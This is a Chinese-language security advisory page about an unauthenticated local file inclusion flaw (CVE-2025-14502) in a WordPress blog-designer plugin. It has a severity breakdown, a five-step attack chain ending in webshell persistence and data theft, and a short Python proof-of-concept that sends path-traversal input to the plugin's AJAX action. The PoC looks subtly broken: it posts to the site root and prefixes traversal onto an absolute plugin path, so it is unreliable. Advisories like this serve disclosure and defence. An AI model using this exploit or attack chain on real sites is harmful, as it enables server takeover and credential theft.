CVE-2025-14502 CVSS 9.8 严重

CVE-2025-14502 WordPress News and Blog Designer Bundle插件本地文件包含漏洞

披露日期: 2026-01-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14502

漏洞类型

本地文件包含(LFI)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress News and Blog Designer Bundle插件

漏洞概述

WordPress的News and Blog Designer Bundle插件存在严重的本地文件包含漏洞。攻击者可以通过构造恶意的template参数值来包含服务器上的任意.php文件，从而执行任意PHP代码。该漏洞影响1.1及以下所有版本，无需认证即可利用。由于可以执行任意PHP代码，攻击者可以绕过访问控制、获取敏感数据或在服务器上执行命令，完全控制受影响的系统。此漏洞评分高达9.8，属于严重级别漏洞，对使用该插件的WordPress网站构成重大威胁。

技术细节

该漏洞源于News and Blog Designer Bundle插件的class-nbdb-ajax.php文件中对template参数的处理不当。攻击者可以通过HTTP请求直接向服务器发送包含路径遍历字符的payload（如../），结合目标系统的已知文件路径，实现本地文件包含（LFI）攻击。由于插件未对用户输入进行充分的过滤和验证，攻击者可以指定任意.php文件的绝对路径或相对路径。一旦成功包含恶意PHP文件，攻击者即可在服务器上执行任意代码，实现远程代码执行（RCE）。此类漏洞常被用于绕过WAF、读取敏感配置文件（如wp-config.php）以及获取数据库凭证等。

攻击链分析

STEP 1

步骤1: 信息收集

识别目标WordPress网站并确认安装了News and Blog Designer Bundle插件

STEP 2

步骤2: 漏洞探测

构造包含路径遍历字符的template参数值，测试是否存在本地文件包含漏洞

STEP 3

步骤3: 文件包含

通过template参数指定恶意PHP文件的路径，使服务器加载并解析该文件

STEP 4

步骤4: 代码执行

成功包含后，攻击者可在服务器上执行任意PHP代码，实现RCE

STEP 5

步骤5: 持久化控制

利用webshell或其他方式建立持久化访问，窃取数据或进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = "http://target-wordpress-site.com"
payload_path = "/wp-content/plugins/news-and-blog-designer-bundle/includes/class-nbdb-ajax.php"

data = {
    "action": "nbdb_get_post",
    "template": "../../../../../../../../" + payload_path + "\0"
}

response = requests.post(target, data=data)
print(response.text)

影响范围

News and Blog Designer Bundle插件 <= 1.1

防御指南

临时缓解措施

立即升级News and Blog Designer Bundle插件到最新版本，或暂时禁用该插件直到安全补丁可用。同时，确保WordPress核心和所有其他插件保持最新状态。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表